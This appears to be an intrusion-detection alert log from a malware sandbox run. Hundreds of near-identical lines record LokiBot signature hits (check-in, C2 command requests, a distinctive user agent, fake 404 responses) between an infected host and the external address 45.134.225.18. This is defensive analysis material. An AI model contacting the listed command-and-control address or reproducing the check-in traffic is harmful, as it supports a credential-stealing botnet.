                12/03/20-09:59:06.236263TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.2.545.134.225.18
                12/03/20-09:59:06.236263TCP2025381ET TROJAN LokiBot Checkin4985680192.168.2.545.134.225.18
                12/03/20-09:59:06.236263TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985680192.168.2.545.134.225.18
                12/03/20-09:59:06.511007TCP2570WEB-MISC Invalid HTTP Version String4985780192.168.2.545.134.225.18
                12/03/20-09:59:06.511007TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.545.134.225.18
                12/03/20-09:59:06.511007TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.2.545.134.225.18
                12/03/20-09:59:06.511007TCP2025381ET TROJAN LokiBot Checkin4985780192.168.2.545.134.225.18
                12/03/20-09:59:06.511007TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985780192.168.2.545.134.225.18
                12/03/20-09:59:06.784478TCP2570WEB-MISC Invalid HTTP Version String4985880192.168.2.545.134.225.18
                12/03/20-09:59:06.784478TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.2.545.134.225.18
                12/03/20-09:59:06.784478TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.2.545.134.225.18
                12/03/20-09:59:06.784478TCP2025381ET TROJAN LokiBot Checkin4985880192.168.2.545.134.225.18
                12/03/20-09:59:06.784478TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985880192.168.2.545.134.225.18
                12/03/20-09:59:07.044170TCP2570WEB-MISC Invalid HTTP Version String4985980192.168.2.545.134.225.18
                12/03/20-09:59:07.044170TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.2.545.134.225.18
                12/03/20-09:59:07.044170TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.2.545.134.225.18
                12/03/20-09:59:07.044170TCP2025381ET TROJAN LokiBot Checkin4985980192.168.2.545.134.225.18
                12/03/20-09:59:07.044170TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985980192.168.2.545.134.225.18
                12/03/20-09:59:07.312919TCP2570WEB-MISC Invalid HTTP Version String4986080192.168.2.545.134.225.18
                12/03/20-09:59:07.312919TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.2.545.134.225.18
                12/03/20-09:59:07.312919TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.2.545.134.225.18
                12/03/20-09:59:07.312919TCP2025381ET TROJAN LokiBot Checkin4986080192.168.2.545.134.225.18
                12/03/20-09:59:07.312919TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986080192.168.2.545.134.225.18
                12/03/20-09:59:07.584280TCP2570WEB-MISC Invalid HTTP Version String4986180192.168.2.545.134.225.18
                12/03/20-09:59:07.584280TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986180192.168.2.545.134.225.18
                12/03/20-09:59:07.584280TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986180192.168.2.545.134.225.18
                12/03/20-09:59:07.584280TCP2025381ET TROJAN LokiBot Checkin4986180192.168.2.545.134.225.18
                12/03/20-09:59:07.584280TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986180192.168.2.545.134.225.18
                12/03/20-09:59:07.870739TCP2570WEB-MISC Invalid HTTP Version String4986280192.168.2.545.134.225.18
                12/03/20-09:59:07.870739TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986280192.168.2.545.134.225.18
                12/03/20-09:59:07.870739TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986280192.168.2.545.134.225.18
                12/03/20-09:59:07.870739TCP2025381ET TROJAN LokiBot Checkin4986280192.168.2.545.134.225.18
                12/03/20-09:59:07.870739TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986280192.168.2.545.134.225.18
                12/03/20-09:59:08.139002TCP2570WEB-MISC Invalid HTTP Version String4986380192.168.2.545.134.225.18
                12/03/20-09:59:08.139002TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986380192.168.2.545.134.225.18
                12/03/20-09:59:08.139002TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986380192.168.2.545.134.225.18
                12/03/20-09:59:08.139002TCP2025381ET TROJAN LokiBot Checkin4986380192.168.2.545.134.225.18
                12/03/20-09:59:08.139002TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986380192.168.2.545.134.225.18
                12/03/20-09:59:08.414954TCP2570WEB-MISC Invalid HTTP Version String4986480192.168.2.545.134.225.18
                12/03/20-09:59:08.414954TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986480192.168.2.545.134.225.18
                12/03/20-09:59:08.414954TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986480192.168.2.545.134.225.18
                12/03/20-09:59:08.414954TCP2025381ET TROJAN LokiBot Checkin4986480192.168.2.545.134.225.18
                12/03/20-09:59:08.414954TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986480192.168.2.545.134.225.18
                12/03/20-09:59:08.692622TCP2570WEB-MISC Invalid HTTP Version String4986580192.168.2.545.134.225.18
                12/03/20-09:59:08.692622TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986580192.168.2.545.134.225.18
                12/03/20-09:59:08.692622TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986580192.168.2.545.134.225.18
                12/03/20-09:59:08.692622TCP2025381ET TROJAN LokiBot Checkin4986580192.168.2.545.134.225.18
                12/03/20-09:59:08.692622TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986580192.168.2.545.134.225.18
                12/03/20-09:59:08.984928TCP2570WEB-MISC Invalid HTTP Version String4986680192.168.2.545.134.225.18
                12/03/20-09:59:08.984928TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986680192.168.2.545.134.225.18
                12/03/20-09:59:08.984928TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986680192.168.2.545.134.225.18
                12/03/20-09:59:08.984928TCP2025381ET TROJAN LokiBot Checkin4986680192.168.2.545.134.225.18
                12/03/20-09:59:08.984928TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986680192.168.2.545.134.225.18
                12/03/20-09:59:09.263939TCP2570WEB-MISC Invalid HTTP Version String4986880192.168.2.545.134.225.18
                12/03/20-09:59:09.263939TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986880192.168.2.545.134.225.18
                12/03/20-09:59:09.263939TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986880192.168.2.545.134.225.18
                12/03/20-09:59:09.263939TCP2025381ET TROJAN LokiBot Checkin4986880192.168.2.545.134.225.18
                12/03/20-09:59:09.263939TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986880192.168.2.545.134.225.18
                12/03/20-09:59:09.530502TCP2570WEB-MISC Invalid HTTP Version String4986980192.168.2.545.134.225.18
                12/03/20-09:59:09.530502TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986980192.168.2.545.134.225.18
                12/03/20-09:59:09.530502TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986980192.168.2.545.134.225.18
                12/03/20-09:59:09.530502TCP2025381ET TROJAN LokiBot Checkin4986980192.168.2.545.134.225.18
                12/03/20-09:59:09.530502TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986980192.168.2.545.134.225.18
                12/03/20-09:59:09.797182TCP2570WEB-MISC Invalid HTTP Version String4987080192.168.2.545.134.225.18
                12/03/20-09:59:09.797182TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987080192.168.2.545.134.225.18
                12/03/20-09:59:09.797182TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987080192.168.2.545.134.225.18
                12/03/20-09:59:09.797182TCP2025381ET TROJAN LokiBot Checkin4987080192.168.2.545.134.225.18
                12/03/20-09:59:09.797182TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987080192.168.2.545.134.225.18
                12/03/20-09:59:10.064325TCP2570WEB-MISC Invalid HTTP Version String4987180192.168.2.545.134.225.18
                12/03/20-09:59:10.064325TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987180192.168.2.545.134.225.18
                12/03/20-09:59:10.064325TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987180192.168.2.545.134.225.18
                12/03/20-09:59:10.064325TCP2025381ET TROJAN LokiBot Checkin4987180192.168.2.545.134.225.18
                12/03/20-09:59:10.064325TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987180192.168.2.545.134.225.18
                12/03/20-09:59:10.344908TCP2570WEB-MISC Invalid HTTP Version String4987280192.168.2.545.134.225.18
                12/03/20-09:59:10.344908TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987280192.168.2.545.134.225.18
                12/03/20-09:59:10.344908TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987280192.168.2.545.134.225.18
                12/03/20-09:59:10.344908TCP2025381ET TROJAN LokiBot Checkin4987280192.168.2.545.134.225.18
                12/03/20-09:59:10.344908TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987280192.168.2.545.134.225.18
                12/03/20-09:59:10.612859TCP2570WEB-MISC Invalid HTTP Version String4987380192.168.2.545.134.225.18
                12/03/20-09:59:10.612859TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987380192.168.2.545.134.225.18
                12/03/20-09:59:10.612859TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987380192.168.2.545.134.225.18
                12/03/20-09:59:10.612859TCP2025381ET TROJAN LokiBot Checkin4987380192.168.2.545.134.225.18
                12/03/20-09:59:10.612859TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987380192.168.2.545.134.225.18
                12/03/20-09:59:10.900499TCP2570WEB-MISC Invalid HTTP Version String4987980192.168.2.545.134.225.18
                12/03/20-09:59:10.900499TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987980192.168.2.545.134.225.18
                12/03/20-09:59:10.900499TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987980192.168.2.545.134.225.18
                12/03/20-09:59:10.900499TCP2025381ET TROJAN LokiBot Checkin4987980192.168.2.545.134.225.18
                12/03/20-09:59:10.900499TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987980192.168.2.545.134.225.18
                12/03/20-09:59:11.198823TCP2570WEB-MISC Invalid HTTP Version String4988080192.168.2.545.134.225.18
                12/03/20-09:59:11.198823TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988080192.168.2.545.134.225.18
                12/03/20-09:59:11.198823TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988080192.168.2.545.134.225.18
                12/03/20-09:59:11.198823TCP2025381ET TROJAN LokiBot Checkin4988080192.168.2.545.134.225.18
                12/03/20-09:59:11.198823TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988080192.168.2.545.134.225.18
                12/03/20-09:59:11.496354TCP2570WEB-MISC Invalid HTTP Version String4988180192.168.2.545.134.225.18
                12/03/20-09:59:11.527747TCP2025483ET TROJAN LokiBot Fake 404 Response804988045.134.225.18192.168.2.5
                12/03/20-09:59:11.496354TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988180192.168.2.545.134.225.18
                12/03/20-09:59:11.496354TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988180192.168.2.545.134.225.18
                12/03/20-09:59:11.496354TCP2025381ET TROJAN LokiBot Checkin4988180192.168.2.545.134.225.18
                12/03/20-09:59:11.496354TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988180192.168.2.545.134.225.18
                12/03/20-09:59:11.775819TCP2570WEB-MISC Invalid HTTP Version String4988280192.168.2.545.134.225.18
                12/03/20-09:59:11.775819TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988280192.168.2.545.134.225.18
                12/03/20-09:59:11.775819TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988280192.168.2.545.134.225.18
                12/03/20-09:59:11.775819TCP2025381ET TROJAN LokiBot Checkin4988280192.168.2.545.134.225.18
                12/03/20-09:59:11.775819TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988280192.168.2.545.134.225.18
                12/03/20-09:59:12.052489TCP2570WEB-MISC Invalid HTTP Version String4988380192.168.2.545.134.225.18
                12/03/20-09:59:12.052489TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.2.545.134.225.18
                12/03/20-09:59:12.052489TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.2.545.134.225.18
                12/03/20-09:59:12.052489TCP2025381ET TROJAN LokiBot Checkin4988380192.168.2.545.134.225.18
                12/03/20-09:59:12.052489TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.2.545.134.225.18
                12/03/20-09:59:12.403129TCP2570WEB-MISC Invalid HTTP Version String4988480192.168.2.545.134.225.18
                12/03/20-09:59:12.403129TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988480192.168.2.545.134.225.18
                12/03/20-09:59:12.403129TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988480192.168.2.545.134.225.18
                12/03/20-09:59:12.403129TCP2025381ET TROJAN LokiBot Checkin4988480192.168.2.545.134.225.18
                12/03/20-09:59:12.403129TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988480192.168.2.545.134.225.18
                12/03/20-09:59:12.757497TCP2570WEB-MISC Invalid HTTP Version String4988580192.168.2.545.134.225.18
                12/03/20-09:59:12.757497TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988580192.168.2.545.134.225.18
                12/03/20-09:59:12.757497TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988580192.168.2.545.134.225.18
                12/03/20-09:59:12.757497TCP2025381ET TROJAN LokiBot Checkin4988580192.168.2.545.134.225.18
                12/03/20-09:59:12.757497TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988580192.168.2.545.134.225.18
                12/03/20-09:59:13.032082TCP2570WEB-MISC Invalid HTTP Version String4988680192.168.2.545.134.225.18
                12/03/20-09:59:13.032082TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988680192.168.2.545.134.225.18
                12/03/20-09:59:13.032082TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988680192.168.2.545.134.225.18
                12/03/20-09:59:13.032082TCP2025381ET TROJAN LokiBot Checkin4988680192.168.2.545.134.225.18
                12/03/20-09:59:13.032082TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988680192.168.2.545.134.225.18
                12/03/20-09:59:13.652793TCP2570WEB-MISC Invalid HTTP Version String4988780192.168.2.545.134.225.18
                12/03/20-09:59:13.652793TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988780192.168.2.545.134.225.18
                12/03/20-09:59:13.652793TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988780192.168.2.545.134.225.18
                12/03/20-09:59:13.652793TCP2025381ET TROJAN LokiBot Checkin4988780192.168.2.545.134.225.18
                12/03/20-09:59:13.652793TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988780192.168.2.545.134.225.18
                12/03/20-09:59:13.921785TCP2570WEB-MISC Invalid HTTP Version String4988880192.168.2.545.134.225.18
                12/03/20-09:59:13.921785TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988880192.168.2.545.134.225.18
                12/03/20-09:59:13.921785TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988880192.168.2.545.134.225.18
                12/03/20-09:59:13.921785TCP2025381ET TROJAN LokiBot Checkin4988880192.168.2.545.134.225.18
                12/03/20-09:59:13.921785TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988880192.168.2.545.134.225.18
                12/03/20-09:59:14.253812TCP2570WEB-MISC Invalid HTTP Version String4988980192.168.2.545.134.225.18
                12/03/20-09:59:14.253812TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988980192.168.2.545.134.225.18
                12/03/20-09:59:14.253812TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988980192.168.2.545.134.225.18
                12/03/20-09:59:14.253812TCP2025381ET TROJAN LokiBot Checkin4988980192.168.2.545.134.225.18
                12/03/20-09:59:14.253812TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988980192.168.2.545.134.225.18
                12/03/20-09:59:15.120022TCP2570WEB-MISC Invalid HTTP Version String4989080192.168.2.545.134.225.18
                12/03/20-09:59:15.120022TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989080192.168.2.545.134.225.18
                12/03/20-09:59:15.120022TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989080192.168.2.545.134.225.18
                12/03/20-09:59:15.120022TCP2025381ET TROJAN LokiBot Checkin4989080192.168.2.545.134.225.18
                12/03/20-09:59:15.120022TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989080192.168.2.545.134.225.18
                12/03/20-09:59:15.767742TCP2570WEB-MISC Invalid HTTP Version String4989180192.168.2.545.134.225.18
                12/03/20-09:59:15.767742TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989180192.168.2.545.134.225.18
                12/03/20-09:59:15.767742TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989180192.168.2.545.134.225.18
                12/03/20-09:59:15.767742TCP2025381ET TROJAN LokiBot Checkin4989180192.168.2.545.134.225.18
                12/03/20-09:59:15.767742TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989180192.168.2.545.134.225.18
                12/03/20-09:59:16.082674TCP2570WEB-MISC Invalid HTTP Version String4989280192.168.2.545.134.225.18
                12/03/20-09:59:16.082674TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989280192.168.2.545.134.225.18
                12/03/20-09:59:16.082674TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989280192.168.2.545.134.225.18
                12/03/20-09:59:16.082674TCP2025381ET TROJAN LokiBot Checkin4989280192.168.2.545.134.225.18
                12/03/20-09:59:16.082674TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989280192.168.2.545.134.225.18
                12/03/20-09:59:16.372100TCP2570WEB-MISC Invalid HTTP Version String4989380192.168.2.545.134.225.18
                12/03/20-09:59:16.372100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989380192.168.2.545.134.225.18
                12/03/20-09:59:16.372100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989380192.168.2.545.134.225.18
                12/03/20-09:59:16.372100TCP2025381ET TROJAN LokiBot Checkin4989380192.168.2.545.134.225.18
                12/03/20-09:59:16.372100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989380192.168.2.545.134.225.18
                12/03/20-09:59:16.654604TCP2570WEB-MISC Invalid HTTP Version String4989480192.168.2.545.134.225.18
                12/03/20-09:59:16.654604TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989480192.168.2.545.134.225.18
                12/03/20-09:59:16.654604TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989480192.168.2.545.134.225.18
                12/03/20-09:59:16.654604TCP2025381ET TROJAN LokiBot Checkin4989480192.168.2.545.134.225.18
                12/03/20-09:59:16.654604TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989480192.168.2.545.134.225.18
                12/03/20-09:59:16.940215TCP2570WEB-MISC Invalid HTTP Version String4989580192.168.2.545.134.225.18
                12/03/20-09:59:16.940215TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989580192.168.2.545.134.225.18
                12/03/20-09:59:16.940215TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989580192.168.2.545.134.225.18
                12/03/20-09:59:16.940215TCP2025381ET TROJAN LokiBot Checkin4989580192.168.2.545.134.225.18
                12/03/20-09:59:16.940215TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989580192.168.2.545.134.225.18
                12/03/20-09:59:17.235455TCP2570WEB-MISC Invalid HTTP Version String4989680192.168.2.545.134.225.18
                12/03/20-09:59:17.235455TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989680192.168.2.545.134.225.18
                12/03/20-09:59:17.235455TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989680192.168.2.545.134.225.18
                12/03/20-09:59:17.235455TCP2025381ET TROJAN LokiBot Checkin4989680192.168.2.545.134.225.18
                12/03/20-09:59:17.235455TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989680192.168.2.545.134.225.18
                12/03/20-09:59:17.509452TCP2570WEB-MISC Invalid HTTP Version String4989780192.168.2.545.134.225.18
                12/03/20-09:59:17.509452TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989780192.168.2.545.134.225.18
                12/03/20-09:59:17.509452TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989780192.168.2.545.134.225.18
                12/03/20-09:59:17.509452TCP2025381ET TROJAN LokiBot Checkin4989780192.168.2.545.134.225.18
                12/03/20-09:59:17.509452TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989780192.168.2.545.134.225.18
                12/03/20-09:59:17.790761TCP2570WEB-MISC Invalid HTTP Version String4989880192.168.2.545.134.225.18
                12/03/20-09:59:17.790761TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989880192.168.2.545.134.225.18
                12/03/20-09:59:17.790761TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989880192.168.2.545.134.225.18
                12/03/20-09:59:17.790761TCP2025381ET TROJAN LokiBot Checkin4989880192.168.2.545.134.225.18
                12/03/20-09:59:17.790761TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989880192.168.2.545.134.225.18
                12/03/20-09:59:18.088761TCP2570WEB-MISC Invalid HTTP Version String4989980192.168.2.545.134.225.18
                12/03/20-09:59:18.088761TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989980192.168.2.545.134.225.18
                12/03/20-09:59:18.088761TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989980192.168.2.545.134.225.18
                12/03/20-09:59:18.088761TCP2025381ET TROJAN LokiBot Checkin4989980192.168.2.545.134.225.18
                12/03/20-09:59:18.088761TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989980192.168.2.545.134.225.18
                12/03/20-09:59:18.369547TCP2570WEB-MISC Invalid HTTP Version String4990080192.168.2.545.134.225.18
                12/03/20-09:59:18.369547TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990080192.168.2.545.134.225.18
                12/03/20-09:59:18.369547TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990080192.168.2.545.134.225.18
                12/03/20-09:59:18.369547TCP2025381ET TROJAN LokiBot Checkin4990080192.168.2.545.134.225.18
                12/03/20-09:59:18.369547TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990080192.168.2.545.134.225.18
                12/03/20-09:59:18.650957TCP2570WEB-MISC Invalid HTTP Version String4990180192.168.2.545.134.225.18
                12/03/20-09:59:18.650957TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990180192.168.2.545.134.225.18
                12/03/20-09:59:18.650957TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990180192.168.2.545.134.225.18
                12/03/20-09:59:18.650957TCP2025381ET TROJAN LokiBot Checkin4990180192.168.2.545.134.225.18
                12/03/20-09:59:18.650957TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990180192.168.2.545.134.225.18
                12/03/20-09:59:18.924633TCP2570WEB-MISC Invalid HTTP Version String4990280192.168.2.545.134.225.18
                12/03/20-09:59:18.924633TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990280192.168.2.545.134.225.18
                12/03/20-09:59:18.924633TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990280192.168.2.545.134.225.18
                12/03/20-09:59:18.924633TCP2025381ET TROJAN LokiBot Checkin4990280192.168.2.545.134.225.18
                12/03/20-09:59:18.924633TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990280192.168.2.545.134.225.18
                12/03/20-09:59:19.185353TCP2570WEB-MISC Invalid HTTP Version String4990380192.168.2.545.134.225.18
                12/03/20-09:59:19.185353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990380192.168.2.545.134.225.18
                12/03/20-09:59:19.185353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990380192.168.2.545.134.225.18
                12/03/20-09:59:19.185353TCP2025381ET TROJAN LokiBot Checkin4990380192.168.2.545.134.225.18
                12/03/20-09:59:19.185353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990380192.168.2.545.134.225.18
                12/03/20-09:59:19.477116TCP2570WEB-MISC Invalid HTTP Version String4990480192.168.2.545.134.225.18
                12/03/20-09:59:19.477116TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990480192.168.2.545.134.225.18
                12/03/20-09:59:19.477116TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990480192.168.2.545.134.225.18
                12/03/20-09:59:19.477116TCP2025381ET TROJAN LokiBot Checkin4990480192.168.2.545.134.225.18
                12/03/20-09:59:19.477116TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990480192.168.2.545.134.225.18
                12/03/20-09:59:19.768997TCP2570WEB-MISC Invalid HTTP Version String4990580192.168.2.545.134.225.18
                12/03/20-09:59:19.768997TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990580192.168.2.545.134.225.18
                12/03/20-09:59:19.768997TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990580192.168.2.545.134.225.18
                12/03/20-09:59:19.768997TCP2025381ET TROJAN LokiBot Checkin4990580192.168.2.545.134.225.18
                12/03/20-09:59:19.768997TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990580192.168.2.545.134.225.18
                12/03/20-09:59:20.059541TCP2570WEB-MISC Invalid HTTP Version String4990680192.168.2.545.134.225.18
                12/03/20-09:59:20.059541TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990680192.168.2.545.134.225.18
                12/03/20-09:59:20.059541TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990680192.168.2.545.134.225.18
                12/03/20-09:59:20.059541TCP2025381ET TROJAN LokiBot Checkin4990680192.168.2.545.134.225.18
                12/03/20-09:59:20.059541TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990680192.168.2.545.134.225.18
                12/03/20-09:59:20.340309TCP2570WEB-MISC Invalid HTTP Version String4990780192.168.2.545.134.225.18
                12/03/20-09:59:20.340309TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990780192.168.2.545.134.225.18
                12/03/20-09:59:20.340309TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990780192.168.2.545.134.225.18
                12/03/20-09:59:20.340309TCP2025381ET TROJAN LokiBot Checkin4990780192.168.2.545.134.225.18
                12/03/20-09:59:20.340309TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990780192.168.2.545.134.225.18
                12/03/20-09:59:20.619975TCP2570WEB-MISC Invalid HTTP Version String4990880192.168.2.545.134.225.18
                12/03/20-09:59:20.619975TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990880192.168.2.545.134.225.18
                12/03/20-09:59:20.619975TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990880192.168.2.545.134.225.18
                12/03/20-09:59:20.619975TCP2025381ET TROJAN LokiBot Checkin4990880192.168.2.545.134.225.18
                12/03/20-09:59:20.619975TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990880192.168.2.545.134.225.18
                12/03/20-09:59:20.897649TCP2570WEB-MISC Invalid HTTP Version String4990980192.168.2.545.134.225.18
                12/03/20-09:59:20.897649TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990980192.168.2.545.134.225.18
                12/03/20-09:59:20.897649TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990980192.168.2.545.134.225.18
                12/03/20-09:59:20.897649TCP2025381ET TROJAN LokiBot Checkin4990980192.168.2.545.134.225.18
                12/03/20-09:59:20.897649TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990980192.168.2.545.134.225.18
                12/03/20-09:59:21.191218TCP2570WEB-MISC Invalid HTTP Version String4991080192.168.2.545.134.225.18
                12/03/20-09:59:21.191218TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991080192.168.2.545.134.225.18
                12/03/20-09:59:21.191218TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991080192.168.2.545.134.225.18
                12/03/20-09:59:21.191218TCP2025381ET TROJAN LokiBot Checkin4991080192.168.2.545.134.225.18
                12/03/20-09:59:21.191218TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991080192.168.2.545.134.225.18
                12/03/20-09:59:21.480236TCP2570WEB-MISC Invalid HTTP Version String4991180192.168.2.545.134.225.18
                12/03/20-09:59:21.480236TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991180192.168.2.545.134.225.18
                12/03/20-09:59:21.480236TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991180192.168.2.545.134.225.18
                12/03/20-09:59:21.480236TCP2025381ET TROJAN LokiBot Checkin4991180192.168.2.545.134.225.18
                12/03/20-09:59:21.480236TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991180192.168.2.545.134.225.18
                12/03/20-09:59:21.763173TCP2570WEB-MISC Invalid HTTP Version String4991280192.168.2.545.134.225.18
